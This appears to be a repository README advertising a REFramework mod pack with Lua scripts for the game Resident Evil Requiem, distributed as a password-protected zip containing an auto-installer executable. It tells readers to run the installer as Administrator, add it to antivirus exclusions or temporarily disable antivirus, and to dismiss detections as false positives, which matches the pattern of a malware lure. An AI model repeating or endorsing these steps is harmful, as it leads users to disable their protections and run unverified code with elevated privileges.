Complete REFramework setup for Resident Evil Requiem (RE9) – includes the latest REFramework build and a collection of essential Lua scripts to enhance your gameplay.
This repository is for educational purposes only. All scripts and tools are provided as-is. Use at your own risk.
- REFramework (dinput8.dll) – The core modding framework for RE Engine games
- Essential Lua Scripts:
fov_slider.lua– Adjust Field of View beyond game limitsdisable_film_grain.lua– Remove distracting film grain effectdisable_vignette.lua– Remove dark edges around screenperformance_boost.lua– Optimize settings for higher FPSultrawide_fix.lua– Proper ultrawide support (21:9, 32:9)freecam.lua– Free camera for screenshotstimescale_control.lua– Slow down or speed up game time
We provide a password-protected archive with the complete setup – just extract and play.
📥 Download RE9-REFramework-Installer.zip
🔐 Password: RE92026
dinput8.dll– REFramework core (latest build for RE9)scripts/– Folder with all Lua scripts (ready to use)RE9-REFramework-Installer.exe– Auto-installer toolreadme.txt– Quick instructions
The included RE9-REFramework-Installer.exe does everything automatically:
- Run
RE9-REFramework-Installer.exeas Administrator. - It will detect your RE9 installation folder (or let you browse manually).
- Click "Install" – the tool will copy
dinput8.dlland all scripts to the correct locations. - A backup of your original
dinput8.dll(if exists) is saved asdinput8.dll.backup. - Launch the game and press Insert to access REFramework.
ℹ️ The auto‑installer is statically compiled and password‑protected to avoid false positives. Add to exclusions if needed.
After installation, all scripts are enabled by default. You can configure them via the REFramework menu (press Insert in-game):
| Script | Function | Menu Location |
|---|---|---|
fov_slider.lua |
Adjust FOV | Script Generated UI → FOV Slider |
disable_film_grain.lua |
Removes film grain | Enabled by default |
disable_vignette.lua |
Removes vignette | Enabled by default |
performance_boost.lua |
FPS optimization | Script Generated UI → Performance |
ultrawide_fix.lua |
Ultrawide support | Script Generated UI → Ultrawide |
freecam.lua |
Free camera | Script Generated UI → Freecam |
timescale_control.lua |
Game speed | Script Generated UI → Timescale |
| Problem | Solution |
|---|---|
| Game crashes on startup | Remove dinput8.dll temporarily. Update to latest REFramework build. |
| REFramework menu doesn't open | Press Insert key. Check if dinput8.dll is in the correct folder. |
| Scripts not loading | Ensure scripts are in reframework/autorun/ folder. Check Lua syntax errors in log file. |
| Ultrawide cutscenes have black bars | Enable "Ultrawide Fix" in REFramework → Display menu. |
| Auto‑installer flagged by antivirus | Temporarily disable AV or add to exclusions – it's a false positive. |
MIT License – educational purposes only.
If this pack helped you, please star the repository – it helps others find it!